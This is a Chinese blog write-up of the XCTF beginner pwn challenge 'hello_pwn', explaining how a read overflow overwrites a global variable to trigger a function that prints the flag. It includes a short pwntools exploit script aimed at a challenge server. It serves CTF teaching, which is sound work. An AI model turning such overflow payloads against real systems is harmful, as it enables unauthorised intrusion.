攻防世界新手区hello_pwn

字数:204字 | 预计阅读时长:1分钟

[攻防世界]新手区hello_pwn

先放进linux里看一下有无保护
先checksec一下

用64位IDA打开,先看字符串窗口,看看有没有可以利用的字符串
在这里插入图片描述
发现可以有system和cat flag,组合使用可以直接拿到flag,点进去看看
在这里插入图片描述
发现在sub_400686函数里,并且可以直接用
在这里插入图片描述
在这里插入图片描述
而主函数里调用该函数条件是dword_60106C等于0x6E756161,且read存在溢出漏洞,栈溢出是向高地址溢出,所以可以由601068溢出来覆盖60106C。

思路:

让unk_601068溢出,覆盖dword_60106C的值为0x6E756161,来使main的if判断成立,调用sub_400686函数,得到flag。

EXP:

1
2
3
4
5
6
from pwn import *
a = remote('111.198.29.45',40481)
payload = 'a'*4 + p64(0x6E756161)
#地址0x00601068到0x0060106C的偏移是4,所以填充4个字符;由于是64位程序,所以用p64打包
a.sendline(payload)
a.interactive()

好活儿,当赏!

微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br>力拔山兮气盖世<br>时不利兮骓不逝
/* */